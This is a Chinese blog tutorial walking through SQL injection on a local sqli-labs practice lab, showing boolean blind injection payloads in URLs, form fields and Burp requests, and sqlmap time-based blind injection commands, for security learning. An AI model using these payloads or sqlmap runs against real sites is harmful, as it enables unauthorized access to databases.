SQL注入中

最新推荐文章于 2024-04-22 21:50:55 发布
最新推荐文章于 2024-04-22 21:50:55 发布
阅读量817 收藏
点赞数
文章标签: linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64655821/article/details/127315404
版权

准备环境

环境:centos7

地址:192.168.175.139

安装并开启docker(yum -y install docker)

拉取sqli靶场(docker pull docker.io/acgpiano/sqli-labs)

开启靶场(docker run -dt --name sqli-labs -p 8088:80 --rm docker.io/acgpiano/sqli-labs)

关闭防火墙或放行80端口使物理机浏览器可以访问

基于布尔的盲注

基于布尔型的盲注,我们通常采用下面的办法猜解字符串.

select length(databse());

select substr(databse(),1,1);

select ascii(substr(database(),1,1));

select ascii(substr(database(),1,1))>N;

select ascii(substr(database(),1,1))=N;

select ascii(substr(database(),1,1))<N;

Get基于布尔的盲注 Sqli-Lab 8实验演示

分别输入/?id=1 和/?id=1’或者/?id=1\,返回的结果情况

 

可以看出有不同地方,则可以判断出这里存在注入点,可以利用这块但是爆数据不可能的

查看源码也可以看出来

然后利用布尔盲注,测试数据库名字的长度 

出现you are in 则证明盲注成功

192.168.175.139:8088/Less-8/?id=1' and length(database())=8 --+

相反的如果是9,则没有任何显示

 192.168.175.139:8088/Less-8/?id=1' and length(database())=9 --+

Post基于布尔的盲注

在存在的注入点POST提交的参数后,加入if判断正确或者错误的语句

select length(databse());

select substr(databse(),1,1);

select ascii(substr(database(),1,1));

select ascii(substr(database(),1,1))>N;

select ascii(substr(database(),1,1))=N;

select ascii(substr(database(),1,1))<N;

Payload//如果不知道用户名用or,但要求用户名要做到不正确,找一个最不像用户名的用户名

uname=admin' and (length(database())>7) -- &passwd=admin123456&submit=Submit

uname=dddd' or  length(database())>7 -- &passwd=admin&submit=Submit

以lesson15为例

账号密码都输入admin,页面显示正常提交

输入不正常的,页面则换了一个图片,没有显示文字,页面有微小变化,因此可以判定有注入点,我们用此变化来判定数据库的名字的长度

 我们可以直接在表单内注入,得出数据库名字长度为8(我是从1开始尝试到8成功)

admin' and length(database())=8 #

使用and的话前面的admin用户名要为真,如果我们没有搜集到用户名则使用or,那么用户名写一个最不像用户名的用户名,因为or要保证特别不像用户名,后面的才能正常显示。

 所以布尔是用页面的微小变化来判定

除了直接在表单内注入,我们还可以使用bp抓包来判定是否有注入点

上bp(bp安装本人博客里有)

先发送一个正确的包(用户账号名admin),他返回的包里有flag.jpg,可以注意到字节数是1705 

 再去发一个错误的包(随便加个') ,返回包是slag.jpg,字节数也变了

在bp内注入uname=admin&passwd=admin' and length(database())=8 #&submit=Submit,返回flag,也同样说明数据库名字长度为8

利用sqlmap探测get基于时间盲注

sqlmap -h 查看sqlmap的帮助信息

B表示布尔盲注,T表示时间盲注(延迟注入)(用到的最多),E表示报错注入,U表示联合查询注入,S表示堆查询注入

--technique T 设置为只基于时间的探测技术

sqlmap -u "http://192.168.175.139:8088/Less-9/?id=1" --technique T --dbs -batch

给kali的sqlmap设置kali的bp代理(自己kali开的bp,所以设置的本地代理),可以在bp看到发出了很多请求包

sqlmap -u "http://192.168.175.139:8088/Less-9/?id=1" --technique T --dbs --proxy "http://127.0.0.1:8080" --batch

 成功爆出(正常的就是一个字节一个字节爆出来的)

最低0.47元/天 解锁文章
晓目
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9338
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
测试工具-sqlmap篇
weixin_42902126的博客
06-27 4255
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
SQL注入
Thewei666的博客
04-22 1197
为了避免从MySQL导出的SQL语句不能被其他数据库使用,它把一些MySQL特有的语句放在 /*!紧跟数据库版本号时,表示当目前的数据库版本号大于指定的版本号时,里面的内容才会被解释 SQL 语句,否则会被当成注释处理而被忽略掉,例如:/*!是指通过web应用程序在接受用户输入的数据时没有做好过滤或验证,并且将其数据带到了数据库进行执行,使攻击者可以拼接构造它的执行代码。攻击者注入一段包含注释符的SQL语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。把用户输入的数据当做代码执行。
常见确认 SQL 注入漏洞方法总结
Flag少侠的博客
04-08 1645
识别漏洞只是目标的一部分。最终目标是利用所测试应用出现的漏洞。要实现该目标,您需要构造一条有效的SOL请求,它会在远程数据库执行且不会引发任何错误。
SQL注入系列篇之union联合注入
d59hao的博客
04-27 694
union注入攻击,通过union或union all连接,将自己写的SQL拼接到原始SQL,从而达到执行任意SQL语句的效果。
sql注入详解
m0_67392811的博客
06-12 5689
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没
SQL注入的WAF绕过技术
08-03
SQL 注入的 WAF 绕过技术 在 SQL 注入攻击, Web 应用防火墙(WAF)是一个非常重要的安全防护机制。然而,攻击者可以使用各种技术来绕过 WAF 检测,从而达到攻击目的。本文将详细介绍 SQL 注入的 WAF 绕过...
SQL注入绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
手把手教你编写SQLMap的Tamper脚本过狗
蚁景网安学院
02-22 579
https://xz.aliyun.com/t/11412sql注入bypass最新版某狗 (qq.com)奇安信攻防社区-记一次实战过狗注入 (butian.net)https://www.freebuf.com/sectool/179035.html本文仅用于技术讨论与学习测试环境最新版某狗测试方法安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆一招鲜吃遍天注释混淆,其...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
SQL注入详解
m0_67391121的博客
07-28 3390
WAF(WebApplicationFirewall)的文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
SQL注入各类型 讲解及利用 (一)
lendq的Blog
05-07 1万+
简介: SQL注入漏洞产生的原因 SQL Injection 程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患 用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作 SQL语句 Structured Query Language 结构化的查询语言,是关系型数据库通讯的标准语言。 查询:SELECT st...
SQL注入使用
j1044957016的博客
05-30 1050
文章目录前言随着自己学习网络安全有段时间了,发现自己过于自信了,什么都学,什么都觉得自己懂了,掉过头来原理都记不住,无奈,只好从头开始整理,权当自己复习一遍了一、OWASP10二、SQL注入的原理1.SQL常出现场景2.SQL注入的分类3.SQL注入的一般步骤三、mysql的一些基本1.mysql的注释风格2.mysql的内联注释3.mysql的union联合查询4.mysql的 order by 语句5.information_schema结构总结 前言 随着自己学习网络安全有段时间了,发现自己
如何绕过WAF进行sql注入
baidu_23564015的博客
05-26 1959
如何绕过WAF进行sql注入 原创 2016-05-26 思成 库安全 关于SQL注入 SQL注入是一种常见的入侵WEB应用的手法。SQL注入是利用应用系统的编程漏洞和SQL语言的语法特征,改变原始的SQL语句执行逻辑而产生的。 攻击者向Web应用发送精心构造的输入数据,这些输入的一部分被解释成SQL指令,改变了原来的正常SQL执行逻辑,执行了攻击者发出的SQL命令,
SQL注入(堆叠注入)——强网杯2019随便注
cc菜的一批
06-10 1359
感谢BUUCTF平台提供题目 0x00 堆叠注入原理 在SQL,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器
SQL注入之联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库的数据,客户端将数 据展示在页面,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)所有字段名8、获取字段的数据一、...
SQL注入详解(下)
weixin_59571952的博客
12-05 1295
五:常见的waf绕过方式以及实战 1:编码 采用url 十六进制等编码方式进行waf绕过 2:大小写绕过 在尝试的时候可以修改语句字母的大小写,如果WAF使用是区分大小写的黑名单,那么就可以使用大小写进行绕过 3:过滤符号绕过 waf可能会过滤掉一些特殊符号 我们可以利用他们过滤的特殊符号来进行绕过 比如 select被拦截了 <>被过滤了 那么我们可以把select写成sel<>ect来进行绕过waf 或者使用双写seselectlect 来进行绕过 4:使用.
sql注入order by
最新发布
04-30
SQL注入,"ORDER BY"是一种常用的攻击手法之一。它通常用于利用应用程序对SQL查询结果的排序方式进行操作,从而获取额外的信息或者绕过安全措施。 "ORDER BY"子句用于对查询结果进行排序。它可以按照一个或多个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值